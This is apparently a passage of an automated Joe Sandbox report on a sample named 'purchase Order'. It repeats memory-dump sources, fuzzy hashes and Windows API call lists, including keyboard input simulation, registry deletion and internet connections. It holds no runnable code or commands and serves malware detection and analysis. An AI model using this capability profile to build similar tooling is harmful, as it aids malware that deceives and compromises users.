                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: 9f42024cc36f39710d356523a4f31ba6c8476ceb28bff76e51bddb91d2f8a7b8
                                                        • Instruction ID: 4a08474c8005c576046a920f60f57a901ffb17200a19021929187042a7757318
                                                        • Opcode Fuzzy Hash: 9f42024cc36f39710d356523a4f31ba6c8476ceb28bff76e51bddb91d2f8a7b8
                                                        • Instruction Fuzzy Hash: 0FD0A730C00712EFCB305F20FC4CF6A76D4AB00311B144439E953D2194DB70CC80C615
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00CA3BD1,?,00CA3E06), ref: 00CA3BE9
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CA3BFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: 601eae609dd4f1aec5466f4e9762f12576de1ae4c5ffb58744da0681e93c243d
                                                        • Instruction ID: aade47fd18921e3f141175fce5d63a59c4b99cd81fa37fc6317c15b46bd7b489
                                                        • Opcode Fuzzy Hash: 601eae609dd4f1aec5466f4e9762f12576de1ae4c5ffb58744da0681e93c243d
                                                        • Instruction Fuzzy Hash: 99D0A7704007579FC7245F60EC09B5BBAF4AB0333CB144439F456E2150D6B4C5808E10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2448d6b03dd295e34e90ea3d3be8e8674bcfd4d09f6d9aff58005d3d1de2a49c
                                                        • Instruction ID: 0d63722aa55a000b613c02000ea39c68facd78934c83371cb2cc10c7fd93421a
                                                        • Opcode Fuzzy Hash: 2448d6b03dd295e34e90ea3d3be8e8674bcfd4d09f6d9aff58005d3d1de2a49c
                                                        • Instruction Fuzzy Hash: 24C12C75A0021AEFDF15DF94C884EAEB7B5FF48710F108598E91AAB251D730EE81DB90
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00C9AAB4
                                                        • CoUninitialize.OLE32 ref: 00C9AABF
                                                          • Part of subcall function 00C80213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C8027B
                                                        • VariantInit.OLEAUT32(?), ref: 00C9AACA
                                                        • VariantClear.OLEAUT32(?), ref: 00C9AD9D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: ede318c982574fd852d04eff3217c76fb864c5ea19105f83865d576dd7b38371
                                                        • Instruction ID: 58768c1422f1e9e10cbec752998150caaef2fb9927e31dfd2f01489b7b0c51bc
                                                        • Opcode Fuzzy Hash: ede318c982574fd852d04eff3217c76fb864c5ea19105f83865d576dd7b38371
                                                        • Instruction Fuzzy Hash: 25A138752047019FDB10EF14C499B1AB7E5FF89720F148459FA969B3A2CB30ED44DB86
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: a4758a321d5c0833c8fde6302bfbfd1fe8b8d32721d5eda4b80cc672d5437d70
                                                        • Instruction ID: 4ee67be60fa617dd408a528523e8b2e0e64eb61c900813abe684824b6657fdea
                                                        • Opcode Fuzzy Hash: a4758a321d5c0833c8fde6302bfbfd1fe8b8d32721d5eda4b80cc672d5437d70
                                                        • Instruction Fuzzy Hash: 665192346047069BDB24AF6AD495B2EB3E9EF45314F20C81FE55FCB2E1DB7098809705
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                        • String ID:
                                                        • API String ID: 3877424927-0
                                                        • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                        • Instruction ID: b6016a65c49b910e93b64e31faa069afd3528260d49d3e975d2c46b5096d0ea9
                                                        • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                        • Instruction Fuzzy Hash: 6351A1B4A00286ABDB348FA9C9C46AE7BB5BF40320F248729F835972D0D775DF519B50
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C83966
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C83982
                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00C839EF
                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00C83A4D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: ef6bc9cc2b50b22056673e12fc1503d0946a3e3aabc7fe43c33582d466e65224
                                                        • Instruction ID: f917d3eca31f21eb83367b76365d3fbd88f8c6e57ebc965345047e0fd68eef32
                                                        • Opcode Fuzzy Hash: ef6bc9cc2b50b22056673e12fc1503d0946a3e3aabc7fe43c33582d466e65224
                                                        • Instruction Fuzzy Hash: 7A414A70A04288AEEF31AB65C809BFDBBB5AB45719F04115AF4D2522C1C7B48F84E76D
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C8E742
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00C8E768
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C8E78D
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C8E7B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: a9ff9f9b50bb9d6fc61eb03e55e668bf57c12dbff109246d8cb71e7a5e3f5d8d
                                                        • Instruction ID: ab5d1cda9cdeb899e206427b212418029d58fafe270358a1845484e1d1027458
                                                        • Opcode Fuzzy Hash: a9ff9f9b50bb9d6fc61eb03e55e668bf57c12dbff109246d8cb71e7a5e3f5d8d
                                                        • Instruction Fuzzy Hash: 52413439200610DFCB21EF15C444A4EBBE5FF9A720B098498E946AB3B2CB70FD40DB95
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 00CAD807
                                                        • GetWindowRect.USER32(?,?), ref: 00CAD87D
                                                        • PtInRect.USER32(?,?,00CAED5A), ref: 00CAD88D
                                                        • MessageBeep.USER32(00000000), ref: 00CAD8FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: 976761b14ba4df1402cb449ae1a16a24d3a6ca133d596178dbf7f5927e867893
                                                        • Instruction ID: 64672cbdc88867ffcabbe1ac0726532180e869da00bf3a57769809a6868ade54
                                                        • Opcode Fuzzy Hash: 976761b14ba4df1402cb449ae1a16a24d3a6ca133d596178dbf7f5927e867893
                                                        • Instruction Fuzzy Hash: 3C41CE74A0020ADFCB11CF59D884BA97BF5FF4A319F1881A9E427CB6A0C735E941CB90
                                                        APIs
                                                        • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00C83AB8
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C83AD4
                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00C83B34
                                                        • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00C83B92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: 3313ee4f2ef7db2049b7b256215c64965839364be59f52c2469bdb9999e1bc6b
                                                        • Instruction ID: 876f56a9694cd285565eb5107708db2813d35fcf092a0c13818a0caeddd414aa
                                                        • Opcode Fuzzy Hash: 3313ee4f2ef7db2049b7b256215c64965839364be59f52c2469bdb9999e1bc6b
                                                        • Instruction Fuzzy Hash: 253166B0A00288AFEF30BB64C819BFEBBA69B45718F04115AE492972D1C7748F45D76D
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C74038
                                                        • __isleadbyte_l.LIBCMT ref: 00C74066
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C74094
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C740CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 62c6995e69f2203f74d9fc7ef047dca32b697717ea891bc247075ce96e713377
                                                        • Instruction ID: cc80b4d77faa0634e625d9767a74998d95b37944588aa76c9deb902067d8d2e9
                                                        • Opcode Fuzzy Hash: 62c6995e69f2203f74d9fc7ef047dca32b697717ea891bc247075ce96e713377
                                                        • Instruction Fuzzy Hash: 5331E131600216EFDB299F75C845BBA7BA9FF40310F19C429EA698B1A0E731D990DB90
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00CA7CB9
                                                          • Part of subcall function 00C85F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C85F6F
                                                          • Part of subcall function 00C85F55: GetCurrentThreadId.KERNEL32 ref: 00C85F76
                                                          • Part of subcall function 00C85F55: AttachThreadInput.USER32(00000000,?,00C8781F), ref: 00C85F7D
                                                        • GetCaretPos.USER32(?), ref: 00CA7CCA
                                                        • ClientToScreen.USER32(00000000,?), ref: 00CA7D03
                                                        • GetForegroundWindow.USER32 ref: 00CA7D09
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: fb4af628f384df79e67d41d5840c5b418e0b3ed598fc4a0fcb749839d29aa7f7
                                                        • Instruction ID: 78e02551c6bb8984e43a1e749ba4bed51e09952eb665b8438acf0e8c83011d0c
                                                        • Opcode Fuzzy Hash: fb4af628f384df79e67d41d5840c5b418e0b3ed598fc4a0fcb749839d29aa7f7
                                                        • Instruction Fuzzy Hash: C8314F76D00108AFDB00EFA9CC859EFFBF9EF55314B108066E815E3211DA309E45DBA4
                                                        APIs
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                        • GetCursorPos.USER32(?), ref: 00CAF211
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00CBE4C0,?,?,?,?,?), ref: 00CAF226
                                                        • GetCursorPos.USER32(?), ref: 00CAF270
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00CBE4C0,?,?,?), ref: 00CAF2A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: a6bef09029ea55e1522cb23c2664a6260c63e08eb5350b2e86586c0c91399b30
                                                        • Instruction ID: c37318d9c6a04378d8411b46ef7e86013512596bc1ceec42658a21aeb927465d
                                                        • Opcode Fuzzy Hash: a6bef09029ea55e1522cb23c2664a6260c63e08eb5350b2e86586c0c91399b30
                                                        • Instruction Fuzzy Hash: 4A217E39500118AFCB159FD4CC98FFE7BB9EB4A714F444169F909872A1D3319E52DB60
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C94358
                                                          • Part of subcall function 00C943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C94401
                                                          • Part of subcall function 00C943E2: InternetCloseHandle.WININET(00000000), ref: 00C9449E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: fb352de78a6b2d913ce0ae8950c54e5da80cea5dd3d3819feb5ba17fb628c8a5
                                                        • Instruction ID: 00feea86be20b448d5dc9eaf8cdfd399c89993e4f55ddee50b8f1086ed007218
                                                        • Opcode Fuzzy Hash: fb352de78a6b2d913ce0ae8950c54e5da80cea5dd3d3819feb5ba17fb628c8a5
                                                        • Instruction Fuzzy Hash: 3721C335200605BFEF1A9F71DC08FBBB7A9FF44711F10401AFA1696660DB71D922A790
                                                        APIs
                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00C98AE0
                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00C98AF2
                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00C98AFF
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C98B16
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastacceptselect
                                                        • String ID:
                                                        • API String ID: 385091864-0
                                                        • Opcode ID: bb78c18dafa6207fb782ff04f2525f85aef0f1bd09dcdb88f2ba4769760f7380
                                                        • Instruction ID: 0304f2d9d449fb8c0a9458a191d3a418085fac05f7a4e224a8157c6c6e73837d
                                                        • Opcode Fuzzy Hash: bb78c18dafa6207fb782ff04f2525f85aef0f1bd09dcdb88f2ba4769760f7380
                                                        • Instruction Fuzzy Hash: 01219671A001249FC7119F69CC85F9EBBECEF4A310F00416AF84AD7251DB749A458F94
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00CA8AA6
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA8AC0
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA8ACE
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CA8ADC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: 80ddff9f54e4ec7c9d10d81826598a7432938dbb00cfafdbefc13434c4aaa728
                                                        • Instruction ID: 6894d34476b8e3bc3aaefee6a529492895d1517485bc4e3be5f1521b695d61fe
                                                        • Opcode Fuzzy Hash: 80ddff9f54e4ec7c9d10d81826598a7432938dbb00cfafdbefc13434c4aaa728
                                                        • Instruction Fuzzy Hash: 7E11D031205112AFE704AB18CC05FBE77A9BF86325F144519F927C72E2CBB0AD459794
                                                        APIs
                                                          • Part of subcall function 00C81E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C80ABB,?,?,?,00C8187A,00000000,000000EF,00000119,?,?), ref: 00C81E77
                                                          • Part of subcall function 00C81E68: lstrcpyW.KERNEL32(00000000,?,?,00C80ABB,?,?,?,00C8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C81E9D
                                                          • Part of subcall function 00C81E68: lstrcmpiW.KERNEL32(00000000,?,00C80ABB,?,?,?,00C8187A,00000000,000000EF,00000119,?,?), ref: 00C81ECE
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C80AD4
                                                        • lstrcpyW.KERNEL32(00000000,?,?,00C8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C80AFA
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C80B2E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: d02ba181b20f371ce4bc4756a2c5829c149c95ff13eafe0f588b07b94ec31bf5
